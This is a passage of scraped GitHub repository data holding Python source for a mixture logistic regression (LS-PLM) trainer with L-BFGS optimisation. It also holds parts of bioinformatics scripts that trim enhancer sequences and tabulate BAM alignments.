'POST'])\n\ndef upload():\n if request.method == 'POST':\n # get the file from post request\n f = request.file['file']\n\n #save the file to ./uploads\n basepath = os.path.dirname(__file__)\n file_path = os.path.join(\n basepath, 'upload', secure_filename(f.filename))\n\n f.save(file_path)\n\n # predict the pict\n preds = model_predict(file_path, model)\n\n # process for human\n result = preds.argmax(axis=1)\n return result\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n\n\n\n\n\n\n\n\n"
}
] | 2 |
wuhongle/MLR | https://github.com/wuhongle/MLR | 5413917695959bf7c5d1df3c0bd0ff2223701b39 | 71b82c320a5673e82d4e6c2c5d5e2fde548428b0 | 8c77eb2eb39059a5a958193cd94accc4ef309f34 | refs/heads/master | 2020-04-24T15:42:26.809613 | 2017-09-04T03:02:23 | 2017-09-04T03:02:23 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4225219190120697,
"alphanum_fraction": 0.43261340260505676,
"avg_line_length": 32.209678649902344,
"blob_id": "e6f60446877a78b669a210dac5f6fe9cc9405996",
"content_id": "c657f1a06784dfaafb35ba9fd0ce2561be5f1bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10901,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 310,
"path": "/ls_plm.py",
"repo_name": "wuhongle/MLR",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport function as fc\r\nimport copy\r\nimport pickle\r\nimport time\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import roc_curve,roc_auc_score\r\nimport random\r\n\r\nclass LSPLM:\r\n\r\n def __init__(self,\r\n feaNum,\r\n classNum,\r\n iterNum = 100,\r\n intercept = True,\r\n memoryNum = 10,\r\n beta = 0.1,\r\n lamb = 0.1,\r\n u_stdev=0.1,\r\n w_stdev=0.1,\r\n ):\r\n \"\"\"\r\n :param feaNum: 特征数\r\n :param classNum: 类别数\r\n :param iterNum:\r\n :param intercept:\r\n :param memoryNum:\r\n :param beta:\r\n :param lamb:\r\n :param u_stdev:\r\n :param w_stdev:\r\n \"\"\"\r\n self.classNum = classNum\r\n self.iterNum = iterNum\r\n self.intercept = intercept\r\n self.memoryNum = memoryNum\r\n self.feaNum = feaNum + 1 if self.intercept else feaNum\r\n self.lossList = []\r\n self.beta = beta\r\n self.lamb = lamb\r\n self.aucList = []\r\n self.w_stdev = w_stdev\r\n self.u_stdev = u_stdev\r\n\r\n def train(self, data,test_data):\r\n \"\"\"\r\n 训练ls-plm large scale piece-wise leanir model\r\n :param data:\r\n :return:\r\n \"\"\"\r\n ACC = []\r\n LOSS = []\r\n TEST_ACC = []\r\n TEST_LOSS = []\r\n AUC = []\r\n TEST_AUC = []\r\n\r\n # np.random.seed(0)\r\n if self.intercept:\r\n data = list(map(self.addBias, data))\r\n test_data = list(map(self.addBias, test_data))\r\n it = 0\r\n WW = [{} for _ in range(self.classNum)]\r\n for w in WW:\r\n for i in range(self.feaNum):\r\n w[i] = np.random.normal(0,self.w_stdev)\r\n WU = [{} for _ in range(self.classNum)]\r\n for u in WU:\r\n for i in range(self.feaNum):\r\n u[i] = np.random.normal(0,self.u_stdev)\r\n\r\n gradient_W = [{} for _ in range(self.classNum)]\r\n gradient_U = [{} for _ in range(self.classNum)]\r\n loss = 0.0\r\n sList = [[] for _ in range(self.classNum * 2)]\r\n roList = [[] for _ in range(self.classNum * 2)]\r\n yList = [[] for _ in range(self.classNum * 2)]\r\n alphaList = [[0] * self.memoryNum for _ in range(self.classNum * 2)]\r\n # #初始化计算 一阶梯度\r\n # gradient_W, gradient_U = fc.cal_derivative(data, weight_W, weight_U, self.norm21, self.norm1, self.feaNum)\r\n # 计算loss 和 auc\r\n loss = fc.calLoss(data, WW, WU, self.lamb, self.beta, self.feaNum)\r\n\r\n # print(\"loss: %s\" % loss)\r\n # print(\"gradient_w: is\")\r\n # for w in weight_W:\r\n # print (w)\r\n # print(\"gradient_u: is\")\r\n # for u in weight_U:\r\n # print(u)\r\n # self.firstLoss = loss\r\n # self.lossList.append(loss)\r\n\r\n pos_data = []\r\n neg_data = []\r\n for item in data:\r\n if item[0] <= 0:\r\n neg_data.append(item)\r\n else:\r\n pos_data.append(item)\r\n # M = len(pos_data) / self.Mrate\r\n\r\n\r\n while it < self.iterNum:\r\n print(\"============iterator : %s ==========\" % it)\r\n start_time = time.time()\r\n\r\n if len(neg_data)>len(pos_data):\r\n print(\"pos_data + shuffle_neg_data\")\r\n shuffle_index = list(range(len(neg_data)))\r\n random.shuffle(shuffle_index)\r\n\r\n shuffle_neg_data = []\r\n for sii in range(len(pos_data)):\r\n shuffle_neg_data.append(neg_data[shuffle_index[sii]])\r\n\r\n data = pos_data + shuffle_neg_data\r\n\r\n\r\n\r\n # 1. 计算虚梯度\r\n #计算梯度\r\n LW, LU = fc.sumCalDerivative(WW, WU, data, weight = 1)\r\n vGW, vGU = fc.virtualGradient(self.feaNum, WW, WU, LW, LU,self.beta, self.lamb)\r\n\r\n # 2. 保存虚梯度方向,用于后续确定搜索方向是否跨象限\r\n vG = vGW + vGU\r\n dir = copy.deepcopy(vG)\r\n # dirW = copy.deepcopy(vGW)\r\n # dirU = copy.deepcopy(vGU)\r\n\r\n # 3. 利用LBFGS算法的两个循环计算下降方向, 这里会直接修改vGradient, 并确定下降方向是否跨象限\r\n fc.lbfgs(self.feaNum, vG, sList, roList, yList, alphaList,dir)\r\n\r\n # # 4. 确定下降方向是否跨象限, 这里也会直接修改vGradient\r\n # fc.fixDirection(vG, dir)\r\n\r\n # 5. 线性搜索最优解\r\n newLoss, newW = fc.backTrackingLineSearch(self.feaNum, it, loss, data, WW+WU, LW+LU, vG, dir,self.lamb, self.beta)\r\n\r\n # 打印结果\r\n newWW = newW[:len(newW)//2]\r\n newWU = newW[len(newW)//2:]\r\n # if self.save :\r\n # pickle.dump((WW,WU), open(\"save/weight\"+self.stamp+\".kpl\", \"wb\"))\r\n\r\n # 计算train 相关参数:\r\n loss = fc.calLoss(data, newWW, newWU, self.lamb, self.beta, self.feaNum)\r\n\r\n count = 0.0\r\n labels = []\r\n scores = []\r\n _tp, _tn, _p, _n = 0, 0, 0, 0\r\n for i in range(len(data)):\r\n d = data[i]\r\n result = fc.mlr(newWW, newWU, d)\r\n labels.append(d[0])\r\n scores.append(result)\r\n if d[0] == 1:\r\n _p += 1\r\n else:\r\n _n += 1\r\n\r\n if abs(result - (1 + d[0]) / 2) < 0.5:\r\n count += 1\r\n if result > 0.5:\r\n _tp += 1\r\n else:\r\n _tn += 1\r\n acc = count / len(data)\r\n print(\"train:\")\r\n print(\"tp = \", _tp, \" p = \", _p, \" tn = \", _tn, \" n = \", _n, \" tp/p = \", _tp / _p, \" tn/n = \", _tn / _n)\r\n ACC.append(str(acc))\r\n LOSS.append(str(loss))\r\n # 计算AUC\r\n roc_auc = roc_auc_score(labels, scores)\r\n AUC.append(str(roc_auc))\r\n\r\n # 计算test相关量\r\n count = 0.0\r\n labels = []\r\n scores = []\r\n _tp, _tn, _p, _n = 0, 0, 0, 0\r\n for i in range(len(test_data)):\r\n d = test_data[i]\r\n result = fc.mlr(newWW, newWU, d)\r\n labels.append(d[0])\r\n scores.append(result)\r\n if d[0] == 1:\r\n _p += 1\r\n else:\r\n _n += 1\r\n\r\n if abs(result - (1 + d[0]) / 2) < 0.5:\r\n count += 1\r\n if result > 0.5:\r\n _tp += 1\r\n else:\r\n _tn += 1\r\n test_loss = fc.calLoss(data, newWW, newWU, self.lamb, self.beta, self.feaNum)\r\n test_acc = count / len(test_data)\r\n print(\"test:\")\r\n print(\"tp = \", _tp, \" p = \", _p, \" tn = \", _tn, \" n = \", _n, \" tp/p = \", _tp / _p, \" tn/n = \", _tn / _n, )\r\n\r\n TEST_ACC.append(str(test_acc))\r\n TEST_LOSS.append(str(test_loss))\r\n # 计算AUC\r\n # fpr, tpr, thresholds = roc_curve(np.array(labels), np.array(scores), pos_label=1)\r\n test_roc_auc = roc_auc_score(labels, scores)\r\n TEST_AUC.append(str(test_roc_auc))\r\n print(\"loss \", loss, \" acc \", acc, \" auc \", roc_auc, \" test loss \", test_loss, \" test acc \", test_acc,\r\n \" test auc \", test_roc_auc)\r\n\r\n\r\n # 6. 判断是否提前终止\r\n if self.check(it, test_roc_auc):\r\n break\r\n else:\r\n # 7. 更新各种参数\r\n self.shift(data, sList, yList, roList, WW + WU, newW, LW, LU)\r\n WW = newWW\r\n WU = newWU\r\n print(\"loss: %s\" % loss)\r\n print(\"============iterator : %s end ==========\" % it)\r\n print(\"\")\r\n it += 1\r\n\r\n print(\"use time: \", time.time() - start_time)\r\n print(\"------------------------------------------------------\\n\")\r\n\r\n\r\n\r\n # with open(\"save/result\"+self.stamp,\"a\") as fw:\r\n # fw.write(\"train_acc:\" + \" \".join(ACC)+\"\\n\")\r\n # fw.write(\"train_loss:\" + \" \".join(LOSS) + \"\\n\")\r\n # fw.write(\"train_auc:\" + \" \".join(AUC) + \"\\n\")\r\n # fw.write(\"test_acc:\" + \" \".join(TEST_ACC) + \"\\n\")\r\n # fw.write(\"test_loss:\" + \" \".join(TEST_LOSS) + \"\\n\")\r\n # fw.write(\"test_auc:\" + \" \".join(TEST_AUC) + \"\\n\")\r\n return WW, WU\r\n\r\n def shift(self,data, sList, yList, roList, W, newW, LW, LU):\r\n newLW, newLU = fc.sumCalDerivative(newW[:len(newW)//2],newW[len(newW)//2:],data)\r\n newGradient = newLW+newLU\r\n gradient = LW + LU\r\n for i in range(len(sList)):\r\n slist = sList[i]\r\n ylist = yList[i]\r\n rolist = roList[i]\r\n w = W[i]\r\n neww = newW[i]\r\n g = gradient[i]\r\n newg = newGradient[i]\r\n\r\n size = len(slist)\r\n if size == self.memoryNum:\r\n # print >> sys.stdout, \"pop 老的S, Y, RO\"\r\n slist.pop(0)\r\n ylist.pop(0)\r\n rolist.pop(0)\r\n\r\n nextS = {}\r\n nextY = {}\r\n fc.addMultInto(self.feaNum, nextS, neww, w, -1)\r\n # print \"newG: %s\" % newGradient\r\n fc.addMultInto(self.feaNum, nextY, newg, g, -1)\r\n # print \"nextS: %s\" % nextS\r\n # print \"nextY: %s\" % nextY\r\n ro = fc.dotProduct(nextS, nextY)\r\n slist.append(nextS)\r\n ylist.append(nextY)\r\n rolist.append(ro)\r\n\r\n def check(self, it, auc):\r\n # if len(self.lossList) <= 5:\r\n # self.lossList.append(newLoss)\r\n # return False\r\n # firstLoss = self.lossList[0]\r\n #\r\n # lastLoss = newLoss\r\n # reduceLoss = (firstLoss - lastLoss )\r\n # averageReduce = reduceLoss / len(self.lossList)\r\n #\r\n # reduceRatio = averageReduce / newLoss\r\n # if len(self.lossList) == 10:\r\n # self.lossList.pop(0)\r\n # self.lossList.append(lastLoss)\r\n #\r\n # if reduceRatio <= self.tol:\r\n # return True\r\n # else:\r\n # return False\r\n self.aucList.append(auc)\r\n # if it < 5 or (self.aucList[-1] < self.aucList[-2] and self.aucList[-2] < self.aucList[-3]):\r\n if it < 100:\r\n return False\r\n else:\r\n return True\r\n\r\n def addBias(self, item):\r\n \"\"\"\r\n add bias\r\n :param item:\r\n :param fN:\r\n :return:\r\n \"\"\"\r\n label, featureDic = item\r\n featureDic[self.feaNum - 1] = 1.0\r\n return (label, featureDic)"
},
{
"alpha_fraction": 0.4674254357814789,
"alphanum_fraction": 0.4861067533493042,
"avg_line_length": 23.28174591064453,
"blob_id": "7cc90f68fb377615057fe6dc812dd68a6e750fc0",
"content_id": "06a7813e2a9df7a56ae3fd47f88795b57a452687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13504,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 504,
"path": "/function.py",
"repo_name": "wuhongle/MLR",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport time\r\nimport copy\r\n\r\ndef performance(f): #定义装饰器函数,功能是传进来的函数进行包装并返回包装后的函数\r\n def fn(*args, **kw): #对传进来的函数进行包装的函数\r\n t_start = time.time() #记录函数开始时间\r\n r = f(*args, **kw) #调用函数\r\n t_end = time.time() #记录函数结束时间\r\n print ('call %s() in %fs' % (f.__name__, (t_end - t_start))) #打印调用函数的属性信息,并打印调用函数所用的时间\r\n return r #返回包装后的函数\r\n return fn #调用包装后的函数\r\n\r\ndef mlr(W, U, item):\r\n \"\"\"\r\n calculate mixture logistic regression\r\n :param U:\r\n :param W:\r\n :param x:\r\n :return:\r\n \"\"\"\r\n label, x = item\r\n prob = 0.0\r\n ux = []\r\n for u in U:\r\n ux.append(dotProduct(u, x))\r\n ux = softmax(ux)\r\n # print(ux)\r\n for index, w in enumerate(W):\r\n prob += ux[index] * sigmoid(dotProduct(w, x))\r\n # print (label, \" \", prob, x)\r\n return prob\r\n\r\n\r\ndef dotProduct(weight, featureDic):\r\n \"\"\"\r\n calculate w * x\r\n :param featureDic:\r\n :param weight:\r\n :return:\r\n \"\"\"\r\n result = 0.0\r\n for index in featureDic:\r\n x = featureDic[index]\r\n w = weight.get(index, 0)\r\n result += x * w\r\n return result\r\n\r\ndef sigmoid(z):\r\n \"\"\"\r\n calculate sigmoid\r\n :param z:\r\n :return:\r\n \"\"\"\r\n return 1 / (1 + np.exp( -max(min(z, 35), -35) ))\r\n\r\ndef softmax(x):\r\n \"\"\"\r\n softmax a array\r\n :param x:\r\n :return:\r\n \"\"\"\r\n e_x = np.exp(x - np.max(x))\r\n return e_x / e_x.sum()\r\n\r\n\r\ndef calculateY(X, w):\r\n Y = []\r\n for x in X:\r\n y = -(w[2] + x * w[0]) / w[1]\r\n Y.append(y)\r\n return Y\r\n\r\ndef calLoss(data, weight_W, weight_U, norm21, norm1, feaNum):\r\n \"\"\"\r\n 计算loss\r\n :param data:\r\n :param weight_W:\r\n :param weight_U:\r\n :return:\r\n \"\"\"\r\n #混合逻辑回归的loss\r\n functionLoss = calFunctionLoss(weight_W, weight_U, data)\r\n #L21正则的loss\r\n norm21Loss = calNorm21(weight_W + weight_U, feaNum)\r\n #L1正则的loss\r\n norm1Loss = calNorm1(weight_W + weight_U)\r\n print( functionLoss , norm21 * norm21Loss , norm1 * norm1Loss)\r\n return functionLoss + norm21 * norm21Loss + norm1 * norm1Loss\r\n\r\ndef calFunctionLoss(W_w, W_u, data):\r\n \"\"\"\r\n calculate the loss over all data\r\n :param w_w:\r\n :param w_u:\r\n :param data:\r\n :return:\r\n \"\"\"\r\n loss = 0.0\r\n for label, featureDic in data:\r\n #sum_u is sum(exp(uj * x))\r\n #sum_us is sum(exp(uj * x) * sigmoid(y * wi * x))\r\n sum_u = 0\r\n sum_us = 0\r\n for i in range(len(W_w)):\r\n wx = dotProduct(W_w[i], featureDic)\r\n eux = np.exp(dotProduct(W_u[i], featureDic))\r\n sum_u += eux\r\n sum_us += eux * sigmoid(label * wx)\r\n loss += np.log(sum_u) - np.log(sum_us)\r\n return loss\r\n # print(\"loss is: %s\" % loss)\r\n\r\ndef calNorm21(weight, feaNum):\r\n '''\r\n 计算norm21\r\n :param weight:\r\n :return:\r\n '''\r\n loss = 0.0\r\n for i in range(feaNum):\r\n d = 0.0\r\n #计算所有weight的第i个维度上的平方和\r\n for w in weight:\r\n d += w.get(i, 0) ** 2\r\n loss += d ** 0.5\r\n return loss\r\n\r\ndef calNorm1(weight):\r\n \"\"\"\r\n 计算norm1\r\n :param weight:\r\n :return:\r\n \"\"\"\r\n loss = 0.0\r\n for w in weight:\r\n for v in w.values():\r\n loss += abs(v)\r\n return loss\r\n\r\ndef calDimension21(W, feaNum):\r\n \"\"\"\r\n 计算每一个维度的L2\r\n :param W:\r\n :return:{dimension1:std1, dimension2:std2 ......}\r\n \"\"\"\r\n D21 = {}\r\n for index in range(feaNum):\r\n sum = 0\r\n for w in W:\r\n sum += w.get(index, 0) ** 2\r\n if sum != 0:\r\n D21[index] = sum ** 0.5\r\n return D21\r\n\r\ndef calGradient(data, weight_W, weight_U, norm2, norm1, feaNum):\r\n \"\"\"\r\n 计算 gradient,\r\n w,u每个都有calssNum个向量\r\n :param data:\r\n :param weight_W:\r\n :param weight_U:\r\n :param norm2:\r\n :param norm1:\r\n :param feaNum:\r\n :return:\r\n \"\"\"\r\n gW = []\r\n gU = []\r\n\r\n\r\ndef cal_derivative(W_w, W_u, item, weight = 1):\r\n \"\"\"\r\n calculate derivative\r\n :param weight:\r\n :return:\r\n \"\"\"\r\n label, featureDic = item\r\n dir_W = []\r\n dir_U = []\r\n temp_eux = []\r\n temp_sywx = []\r\n sum_eux = 0.0\r\n sum_eux_sywx = 0.0\r\n for i in range(len(W_w)):\r\n #get all the temp exp(uj * x) and sigmoid(y * wj * x)\r\n #and get sum at the same time\r\n eux = np.exp(dotProduct(W_u[i], featureDic))\r\n sywx = sigmoid(label * dotProduct(W_w[i], featureDic))\r\n temp_eux.append(eux)\r\n temp_sywx.append(sywx)\r\n sum_eux += eux\r\n sum_eux_sywx += eux * sywx\r\n for i in range(len(W_w)):\r\n #calculate array uj and array wj\r\n dir_w = {}\r\n dir_u = {}\r\n for index in featureDic:\r\n dir_u[index] = temp_eux[i] * featureDic[index] / sum_eux - \\\r\n temp_eux[i] * temp_sywx[i] * featureDic[index] / sum_eux_sywx\r\n dir_w[index] = label * temp_eux[i] * temp_sywx[i] * ( temp_sywx[i] - 1 ) * featureDic[index] / sum_eux_sywx\r\n if label > 0:\r\n dir_u[index] *= weight\r\n dir_w[index] *= weight\r\n dir_W.append(dir_w)\r\n dir_U.append(dir_u)\r\n\r\n return dir_W, dir_U\r\n\r\ndef sumCalDerivative(WW, WU, data,weight = 1):\r\n # 计算所有样本的梯度和(所有样本的一阶导数和),weight为负样本数/正样本数。\r\n LW = [{} for _ in range(len(WW))]\r\n LU = [{} for _ in range(len(WW))]\r\n for item in data:\r\n lw, lu = cal_derivative(WW, WU, item)\r\n #如果是正样本,乘以权重,这样正样本更重要\r\n if item[0] > 0:\r\n pos_weight = weight\r\n else:\r\n pos_weight = 1\r\n for i in range(len(WW)):\r\n for index in lw[i]:\r\n LW[i].setdefault(index, 0)\r\n LW[i][index] += lw[i][index] * pos_weight\r\n for index in lu[i]:\r\n LU[i].setdefault(index, 0)\r\n LU[i][index] += lu[i][index] * pos_weight\r\n for lw in LW:\r\n for k in lw:\r\n lw[k] /= len(data)\r\n for lu in LU:\r\n for k in lu:\r\n lu[k] /= len(data)\r\n\r\n return LW, LU\r\n\r\n\r\n\r\n\r\ndef virtualGradient(feaNum, WW, WU, GW, GU,beta,lamb):\r\n \"\"\"\r\n 计算虚梯度,也就是论文中的d_ij\r\n :param feaNum:\r\n :param weight_W:\r\n :param weight_U:\r\n :param gradient_W:\r\n :param gradient_U:\r\n :param norm21:\r\n :param norm1:\r\n :return:\r\n \"\"\"\r\n #计算θ_i·\r\n D21 = calDimension21(WW + WU, feaNum)\r\n #计算v:\r\n VW = calV(GW, beta)\r\n VU = calV(GU, beta)\r\n #计算v_i·\r\n VD21 = calDimension21(VW + VU, feaNum)\r\n sumVD21 = sum(VD21.values())\r\n\r\n #\r\n #计算d_ij\r\n DW = calDij(GW, WW, VW, D21, sumVD21, beta, lamb, feaNum)\r\n DU = calDij(GU, WU, VU, D21, sumVD21, beta, lamb, feaNum)\r\n return DW, DU\r\n\r\ndef calV(L, beta):\r\n \"\"\"\r\n 计算v,包括wv, uv,这里是分别计算的\r\n (可以和到一起算,因为w,u一直都是分着算的,所以这里也分着算了。重构的时候再优化吧)\r\n :param LW:\r\n :param LU:\r\n :param beta:\r\n :param lamb:\r\n :return:\r\n \"\"\"\r\n V = copy.deepcopy(L)\r\n for v in V:\r\n for index in v:\r\n v[index] = max(abs(v[index]) - beta, 0) * sign(-v[index])\r\n return V\r\n\r\ndef calDij(L, W, V, D21, sumVD21, beta, lamb, feaNum):\r\n \"\"\"\r\n 分三种情况讨论,并计算d_i\r\n :param L: loss of θ, matrix\r\n :param W: weight,θ, matrix\r\n :param V: v , matrix\r\n :param D21: norm21, W_i· of W , vector\r\n :param sumVD21: norm21, value\r\n :param beta:\r\n :param lamb:\r\n :param feaNum:\r\n :return:\r\n \"\"\"\r\n D = [{} for _ in range(len(W))]\r\n for i,d in enumerate(D):\r\n for index in range(feaNum):\r\n if D21.get(i,0) == 0:\r\n temp = V[i].get(index, 0) * max(sumVD21 - lamb, 0) / sumVD21\r\n\r\n elif W[i].get(index, 0) == 0:\r\n s = -L[i].get(index,0)\r\n temp = max(abs(s) - beta, 0) * sign(s)\r\n\r\n else:\r\n s = -L[i].get(index, 0) - lamb * W[i].get(index, 0) / D21.get(index)\r\n temp = s - beta * sign(W[i].get(index, 0))\r\n\r\n if temp != 0:\r\n d[index] = temp\r\n return D\r\n\r\n\r\ndef lbfgs(feaNum, vG, sList, roList, yList, alphaList, DIR):\r\n \"\"\"\r\n 两个循环计算下降方向,拟合Hessian矩阵的 逆H 和梯度负方向的乘积,即 -H * f'\r\n :param feaNum:\r\n :param vG: matrix, 2m*d\r\n :param sList:matrix, 2m*d\r\n :param roList:matrix, 2m*d\r\n :param yList:matrix, 2m*d\r\n :param alphaList:matrix, 2m*d\r\n :return:\r\n \"\"\"\r\n for _i in range(len(sList)):\r\n vg = vG[_i]\r\n slist = sList[_i]\r\n rolist = roList[_i]\r\n ylist = yList[_i]\r\n alist = alphaList[_i]\r\n dir = DIR[_i]\r\n count = len(slist)\r\n if count > 0:\r\n indexList = list(range(0, count))\r\n indexList.reverse()\r\n for i in indexList:\r\n alist[i] = -1.0 * dotProduct(vg,slist[i]) / rolist[i]\r\n addMult(feaNum, vg, ylist[i], alist[i])\r\n\r\n lastY = ylist[-1]\r\n yDotY = dotProduct(lastY, lastY)\r\n scalar = rolist[-1] / yDotY\r\n scale(vg, scalar);\r\n\r\n for i in range(0, count):\r\n beta = dotProduct(vg, ylist[i],) / rolist[i]\r\n addMult(feaNum, vg, slist[i], -alist[i] - beta);\r\n\r\n #判断y(k)T * s(k) > 0\r\n if count > 0 and dotProduct(ylist[-1], slist[-1]) > 0:\r\n for index in vg:\r\n if sign(vg[index] != sign(dir.get(index,0))):\r\n vg[index] = dir.get(index,0)\r\n else:\r\n vG[_i] = dir\r\n\r\ndef addMult(paramCount, vecDic1, vecDic2, c):\r\n for index in range(0, paramCount):\r\n v1 = vecDic1.get(index, 0)\r\n vecDic1[index] = v1 + vecDic2.get(index, 0) * c\r\n\r\ndef addMultInto(paramCount, vec1, vec2, vec3, c):\r\n for index in range(0, paramCount):\r\n vec1[index] = vec2.get(index, 0) + vec3.get(index, 0) * c\r\n\r\n\r\ndef scale(vecDic1, c):\r\n for index in vecDic1:\r\n vecDic1[index] *= c\r\n\r\ndef fixDirection(vGW, vGU, dirW, dirU):\r\n \"\"\"\r\n 检查下降是否跨象限\r\n :param vGW:\r\n :param vGU:\r\n :param dirW:\r\n :param dirU:\r\n :return:\r\n \"\"\"\r\n pass\r\n\r\ndef backTrackingLineSearch(feaNum, it, loss, data, W, L, vG, dir,norm21, norm1):\r\n \"\"\"\r\n 线性搜索,得到最佳步长并更新权重\r\n :param it:\r\n :param oldLoss:\r\n :param data:\r\n :param WW:\r\n :param WU:\r\n :param GW:\r\n :param GU:\r\n :param vGW:\r\n :param vGU:\r\n :return:\r\n \"\"\"\r\n alpha = 1.0\r\n backoff = 0.5\r\n if it == 0:\r\n # normalDir = dotProduct(vG, vG) ** 0.5\r\n # alpha = 1.0 / normalDir\r\n backoff = 0.1\r\n gamma = 1e-5\r\n loss_it = 0;\r\n while True:\r\n\r\n\r\n newW = getNewWeight(feaNum, W, vG, alpha, dir )\r\n\r\n new_loss = calLoss(data, newW[:len(newW)//2], newW[len(newW)//2:], norm21, norm1, feaNum)\r\n\r\n #论文中的阈值项\r\n threshold = calThreshold(dir, W, newW)\r\n\r\n if new_loss <= loss + gamma * threshold or(loss_it > 0 and new_loss > pre_loss):\r\n return new_loss, newW\r\n pre_loss = new_loss\r\n alpha *= backoff\r\n loss_it += 1\r\n\r\ndef calThreshold(dir, W, newW):\r\n \"\"\"\r\n 计算论文中阈值项\r\n :param dir:\r\n :param W:\r\n :param newW:\r\n :return:\r\n \"\"\"\r\n threshold = 0\r\n for i,d in enumerate(dir):\r\n for index in d:\r\n threshold += -d[index] * (newW[i].get(index, 0) - W[i].get(index, 0))\r\n return threshold\r\n\r\ndef getNewWeight(feaNum, W, vG, alpha, dir ):\r\n \"\"\"\r\n 计算新的参数\r\n :param feaNum:\r\n :param W:\r\n :param vG:\r\n :param alpha:\r\n :return:\r\n \"\"\"\r\n new_W = [{} for _ in range(len(W))]\r\n for i, w in enumerate(W):\r\n for index in range (feaNum):\r\n _w = w.get(index, 0)\r\n if _w == 0:\r\n _sign = sign(dir[i].get(index, 0))\r\n else:\r\n _sign = sign(_w)\r\n _new_w = _w + alpha * vG[i].get(index,0)\r\n if sign(_new_w) == sign(_sign):\r\n new_W[i][index] = _new_w\r\n return new_W\r\n\r\n\r\ndef check(it, loss, newLoss, WW, WU):\r\n \"\"\"\r\n 检查是否提前终止\r\n :param it:\r\n :param loss:\r\n :param newLoss:\r\n :param WW:\r\n :param WU:\r\n :return:\r\n \"\"\"\r\n pass\r\n\r\ndef shift(sList, yList, roList, weight, newWeight, gradient, newGradient):\r\n \"\"\"\r\n 更新\r\n :param sList:\r\n :param yList:\r\n :param roList:\r\n :param weight:\r\n :param newWeight:\r\n :param gradient:\r\n :param newGradient:\r\n :return:\r\n \"\"\"\r\n pass\r\n\r\ndef sign(x):\r\n \"\"\"\r\n return 1,0,-1\r\n :param x:\r\n :return:\r\n \"\"\"\r\n if x < 0:\r\n return -1\r\n elif x > 0:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef calAcc(data, WW, WU):\r\n count = 0.0\r\n for i in range(len(data)):\r\n d = data[i]\r\n result = mlr(WW, WU, d)\r\n if abs(result - (1 + d[0]) / 2) < 0.5:\r\n count += 1\r\n return count / len(data)"
}
] | 2 |
hbc/gray-enhancers | https://github.com/hbc/gray-enhancers | 4315aab17bddcdd6f4de76877047f642462e888f | 97cf6a9a2dcf9391e9f51d64431f9f4770538a2b | 4a1d6d8ae1dddd479e9ba8dc58ea6b456fb03b69 | refs/heads/master | 2021-01-19T20:13:04.822057 | 2015-10-25T20:59:20 | 2015-10-25T20:59:20 | 24,687,974 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6987951993942261,
"alphanum_fraction": 0.7469879388809204,
"avg_line_length": 35.3125,
"blob_id": "dc6de9f8ef13a6424445131734923b0d925bd80a",
"content_id": "29551e32f4fa2898c5427ccf16eedf041a4be3b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1162,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 32,
"path": "/code/trim_enhancers.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe supplied enhancer sequences have two non-enhancer sequences on\nthe end, this cuts those off.\n\n>-249753741_hs_Endogenous_chr1:6052584^WCGCGTYat-59^GATTGGYat-29^GATTGGYat14^YGCGGCKSat23\nACTGGCCGCTTCACTGaactccccagcagcctgtacgtttagtcctacccgggcCCGCCGCAggGATTGGCaccgcgagcgtttcgcgtcgggagctgaacccgagaGATTGGCaggcgccgggactgccgctgtcaGACGCGAccgcccaagaCACTGCGGCTCCTCA\n\nto\n\n>-249753741_hs_Endogenous_chr1:6052584^WCGCGTYat-59^GATTGGYat-29^GATTGGYat14^YGCGGCKSat23\naactccccagcagcctgtacgtttagtcctacccgggcCCGCCGCAggGATTGGCaccgcgagcgtttcgcgtcgggagctgaacccgagaGATTGGCaggcgccgggactgccgctgtcaGACGCGAccgcccaaga\n\nthis keeps only unique sequences\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport itertools\n\nseen = set()\n\nwith open(sys.argv[1], \"r\") as in_handle:\n for name, seq in itertools.izip_longest(*[in_handle]*2):\n llen = len(seq)\n piece = seq[16:(llen-16)].strip()\n if piece not in seen:\n seen.update([piece])\n print(name.strip(), file=sys.stdout)\n print(piece, file=sys.stdout)\n else:\n print(\"%s sequence already seen, skipping %s.\" % (seq, name),\n file=sys.stderr)\n"
},
{
"alpha_fraction": 0.5093245506286621,
"alphanum_fraction": 0.5174737572669983,
"avg_line_length": 28.67906951904297,
"blob_id": "3f14a14ddba39fe3456bbf8101b8a3c2df652dcd",
"content_id": "0e68c4dd30467c1c944b22c570dae31376a0c28a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6381,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 215,
"path": "/code/bam_to_table.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "from collections import Counter, defaultdict\nfrom argparse import ArgumentParser\nimport os\nimport pysam\nimport toolz as tz\nimport sys\n\n\nOUT_HEADER = [\"id\", \"ename\", \"barcode\", \"eid\", \"species\", \"subtype\", \"mismatch\",\n \"mapq\", \"as\", \"xs\", \"clipped\", \"insertions\", \"deletions\",\n \"matched\", \"other\", \"seq\"]\n\ndef open_samfile(in_file):\n if is_bam(in_file):\n return pysam.Samfile(in_file, \"rb\")\n elif is_sam(in_file):\n return pysam.Samfile(in_file, \"r\")\n else:\n raise IOError(\"in_file must be either a BAM file or SAM file. Is the \"\n \"extension .sam or .bam?\")\n\ndef is_bam(in_file):\n _, ext = os.path.splitext(in_file)\n if ext == \".bam\":\n return True\n else:\n return False\n\n\ndef is_sam(in_file):\n _, ext = os.path.splitext(in_file)\n if ext == \".sam\":\n return True\n else:\n return False\n\ndef parse_cigar_tuples(tuples):\n d = {\"insertions\": 0,\n \"deletions\": 0,\n \"clipped\": 0,\n \"matched\": 0,\n \"other\": 0}\n if not tuples:\n 